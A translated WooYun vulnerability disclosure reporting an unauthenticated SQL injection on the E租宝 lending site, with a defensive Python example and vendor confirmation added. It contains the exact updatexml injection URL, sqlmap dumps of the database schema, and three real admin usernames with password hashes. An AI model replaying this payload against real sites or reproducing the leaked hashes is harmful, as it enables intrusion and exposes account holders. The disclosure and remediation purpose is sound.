Vulnerability summary

Defect ID: wooyun-2015-0153443

Title: P2P security: E租宝 has an injection vulnerability

Vendor: E租宝

Author: 路人甲

Submitted: 2015-11-10 21:55

Fixed: 2015-12-26 10:16

Published: 2015-12-26 10:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-10: Details sent to the vendor; awaiting vendor handling
2015-11-11: Vendor confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and experts in the relevant field
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public

Brief description:

The official site of E租宝, a 钰诚集团 (Yucheng Group) company, has a serious vulnerability: SQL injection is possible without being logged in.

Detailed description:

Reference:
WooYun: a generic injection in the 绿麻雀 (Lvmaque) P2P lending system

[Image: 1.png]

http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)

Opening it shows the following:

[Image: 2.png]

Without hesitation, I fed the following URL (the asterisk marks the injection point for sqlmap) into sqlmap:

http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1*,1,0x22),1)

[Image: 3.png]

Proof of vulnerability:

available databases [4]:
[*] ezubao_php
[*] information_schema
[*] mysql
[*] performance_schema
Database: ezubao_php
Table: lzh_accounts
[5 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| id | int(10) unsigned |
| is_final | tinyint(3) unsigned |
| level_id | varchar(12) |
| name | varchar(50) |
| upd_time | timestamp |
+----------+---------------------+
Database: ezubao_php
Table: lzh_ad
[8 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| ad_type | tinyint(4) |
| add_time | int(10) |
| content | varchar(5000) |
| end_time | int(10) |
| id | int(10) unsigned |
| start_time | int(10) |
| title | varchar(100) |
| upd_time | timestamp |
+------------+------------------+
Database: ezubao_php
[166 tables]
+-------------------------------+
| lzh_access_count |
| lzh_account_log |
| lzh_account_recharge |
| lzh_accounts |
| lzh_achievements |
| lzh_acl |
| lzh_active |
| lzh_active_level |
| lzh_ad |
| lzh_announcement |
| lzh_app_project_icon |
| lzh_area |
| lzh_article |
| lzh_article_area |
| lzh_article_category |
| lzh_article_category_area |
| lzh_article_notice |
| lzh_auser_dologs |
| lzh_ausers |
| lzh_auth |
| lzh_auto_borrow |
| lzh_baobiao |
| lzh_baobiao_copy |
| lzh_bid_info |
| lzh_borrow_fsf |
| lzh_borrow_info |
| lzh_borrow_info_copy |
| lzh_borrow_info_lock |
| lzh_borrow_investor |
| lzh_borrow_message |
| lzh_borrow_tip |
| lzh_borrow_verify |
| lzh_borrow_vouch |
| lzh_carousel |
| lzh_ceshi_member |
| lzh_ceshi_money |
| lzh_comment |
| lzh_cps |
| lzh_datacenter_sync |
| lzh_debit_credit |
| lzh_debit_credit_init |
| lzh_department |
| lzh_department_changelog |
| lzh_donate |
| lzh_draw_goods |
| lzh_email_log |
| lzh_exp_actor |
| lzh_exp_borrow |
| lzh_exp_interest |
| lzh_exp_invest |
| lzh_exp_money |
| lzh_exp_project |
| lzh_face_apply |
| lzh_feedback |
| lzh_financial_maneger |
| lzh_financial_offline_user |
| lzh_financial_sell_log |
| lzh_finanicial_manager_tmp |
| lzh_fmanager |
| lzh_fmanager_client_log |
| lzh_fmanager_client_static |
| lzh_fmanager_dept_static |
| lzh_fmanager_fmg_static |
| lzh_fmanager_invest_back |
| lzh_fmanager_invest_static |
| lzh_fmanager_log |
| lzh_fmanager_maping |
| lzh_fmanager_messages |
| lzh_fmanager_static |
| lzh_fmanager_status |
| lzh_fmanager_virtual_members |
| lzh_fmaneger_static |
| lzh_friend |
| lzh_global |
| lzh_hetong |
| lzh_inner_msg |
| lzh_interface |
| lzh_invest_credit |
| lzh_invest_detb |
| lzh_investoffline |
| lzh_investor_detail |
| lzh_key_value |
| lzh_leader_phone |
| lzh_lottery_draw |
| lzh_lottery_draw_status |
| lzh_market_address |
| lzh_market_goods |
| lzh_market_jifenlist |
| lzh_market_log |
| lzh_member_apply |
| lzh_member_audit |
| lzh_member_banks |
| lzh_member_borrow_show |
| lzh_member_contact_info |
| lzh_member_creditslog |
| lzh_member_data_info |
| lzh_member_department_info |
| lzh_member_ensure_info |
| lzh_member_financial_info |
| lzh_member_friend |
| lzh_member_house_info |
| lzh_member_info |
| lzh_member_integrallog |
| lzh_member_limitlog |
| lzh_member_login |
| lzh_member_money |
| lzh_member_moneylog |
| lzh_member_msg |
| lzh_member_payonline |
| lzh_member_phonelog |
| lzh_member_phoneshield |
| lzh_member_questionnaire |
| lzh_member_remark |
| lzh_member_safequestion |
| lzh_member_token |
| lzh_member_withdraw |
| lzh_members |
| lzh_members_status |
| lzh_moneylog_property |
| lzh_msg_offcial |
| lzh_msg_phonelog_join |
| lzh_msg_tpl |
| lzh_name_apply |
| lzh_navigation |
| lzh_new_department |
| lzh_pay_banknum |
| lzh_pay_banks |
| lzh_pay_posorder |
| lzh_payreturn_log |
| lzh_person_more |
| lzh_prize |
| lzh_prize_date |
| lzh_push_msg |
| lzh_push_token |
| lzh_qq |
| lzh_recommend_import_log |
| lzh_recommend_log |
| lzh_recommend_logs |
| lzh_red_key |
| lzh_red_packet |
| lzh_red_put |
| lzh_red_putuser |
| lzh_red_userkey |
| lzh_report_total_static |
| lzh_sheet |
| lzh_sms_log |
| lzh_smslog |
| lzh_spring_white_list |
| lzh_stat_accounting |
| lzh_stat_moneylog |
| lzh_sys_tip |
| lzh_tmp_ip |
| lzh_today_reward |
| lzh_transfer_borrow_info |
| lzh_transfer_borrow_info_lock |
| lzh_transfer_borrow_investor |
| lzh_transfer_detail |
| lzh_transfer_investor_detail |
| lzh_twhite |
| lzh_update_version |
| lzh_useredit_log |
| lzh_verify |
| lzh_video_apply |
| lzh_vip_apply |
| table_struct_change |
| think_cache |
+-------------------------------+
select user_name,user_pwd from lzh_ausers [3]:
[*] admin, ab044bb3707a5bb729ce9500ba08b240
[*] jiangjun, 9f2cf1d42d5bf5efc754898ac5a2ecc0
[*] zongchen, ce83ac766dc561d2ae1a206fb0cd0b94
Database: ezubao_php
Table: lzh_ausers
[17 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| area_id | int(11) |
| area_name | varchar(10) |
| id | int(11) |
| is_ban | int(1) |
| is_kf | int(10) unsigned |
| last_log_ip | varchar(30) |
| last_log_time | int(10) |
| phone | varchar(20) |
| qq | varchar(20) |
| real_name | varchar(20) |
| u_company_flag | smallint(6) |
| u_group_id | smallint(6) |
| upd_time | timestamp |
| user_name | varchar(50) |
| user_pass | varchar(50) |
| user_pwd | varchar(50) |
| user_word | varchar(100) |
+----------------+------------------+

Fix:

Update to a newer version

Copyright notice: when reproducing, credit the source: 路人甲@乌云
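The report's fix is simply "update to a newer version"; for a defender, the underlying correction is to stop splicing the idarr path segment into SQL text. The following Python example is added here and is not code from the report, from E租宝 or from the 绿麻雀 system. It shows the vulnerable concatenation pattern next to a hardened handler that validates idarr as a comma-separated list of integers and binds the values as query parameters, plus a small check that flags updatexml/extractvalue probes in request paths for log review. It assumes an in-memory SQLite table named lzh_borrow_info (the table name comes from the dump above; the columns and rows are constructed) standing in for the real MySQL database, and the doDel handler layout is a hypothetical reconstruction, not the site's code.

```python
import re
import sqlite3
from typing import List

# Hypothetical stand-in for the doDel action's target table. The table name
# appears in the report's dump; the columns and rows below are constructed.
TABLE = "lzh_borrow_info"

# The injection value taken from the report, used here only as a rejection case.
REPORTED_PAYLOAD = "updatexml(1,if(1=1,1,0x22),1)"

# idarr is expected to look like "12" or "12,15,20": decimal integers separated by commas.
ID_LIST_RE = re.compile(r"\d+(,\d+)*")

# Error-based probes arrive as SQL function calls inside a path segment.
PROBE_RE = re.compile(r"(updatexml|extractvalue)\s*\(", re.IGNORECASE)


def make_db() -> sqlite3.Connection:
    """Create the constructed sample table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {TABLE} (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        f"INSERT INTO {TABLE} (id, title) VALUES (?, ?)",
        [(1, "loan-a"), (2, "loan-b"), (3, "loan-c")],
    )
    conn.commit()
    return conn


def build_delete_vulnerable(idarr: str) -> str:
    """The bug class behind the report: the raw path segment becomes part of the SQL text.
    The statement is returned, not executed, so the effect of an attacker-controlled
    value on the query text is visible."""
    return f"DELETE FROM {TABLE} WHERE id IN ({idarr})"


def is_valid_id_list(idarr: str) -> bool:
    """Allow-list check: only a comma-separated list of integers passes."""
    return ID_LIST_RE.fullmatch(idarr) is not None


def parse_id_list(idarr: str) -> List[int]:
    """Validate first, then convert; anything else is rejected before it reaches SQL."""
    if not is_valid_id_list(idarr):
        raise ValueError(f"rejected idarr value: {idarr!r}")
    return [int(part) for part in idarr.split(",")]


def delete_rows_hardened(conn: sqlite3.Connection, idarr: str) -> int:
    """Validated ids are bound as parameters; the SQL text never contains user input."""
    ids = parse_id_list(idarr)
    placeholders = ",".join("?" * len(ids))  # one "?" per id, e.g. "?,?"
    cur = conn.execute(f"DELETE FROM {TABLE} WHERE id IN ({placeholders})", ids)
    conn.commit()
    return cur.rowcount


def remaining_ids(conn: sqlite3.Connection) -> List[int]:
    """Ids still present, used to confirm what the hardened delete touched."""
    return [row[0] for row in conn.execute(f"SELECT id FROM {TABLE} ORDER BY id")]


def is_injection_probe(path: str) -> bool:
    """Detection helper for access logs: flag request paths carrying error-based
    injection functions in a segment that should only hold ids."""
    return PROBE_RE.search(path) is not None


if __name__ == "__main__":
    # Vulnerable pattern: the attacker's function call lands inside the query text.
    print(build_delete_vulnerable(REPORTED_PAYLOAD))
    conn = make_db()
    print(delete_rows_hardened(conn, "1,3"), remaining_ids(conn))
    try:
        delete_rows_hardened(conn, REPORTED_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
    print(is_injection_probe("/home/borrow/doDel/idarr/" + REPORTED_PAYLOAD))
```

The allow-list regex is the first line of defence and the bound parameters are the second; either alone would have stopped the reported payload, but keeping both means a future change to the id format cannot silently reopen the concatenation path. The probe check is deliberately narrow (only the two error-based functions named in this report's technique) so it can be run over existing web logs with few false positives.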


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-11-11 10:15

Vendor reply:

The vulnerability has been fixed; thanks to the white hat.

Latest status:

None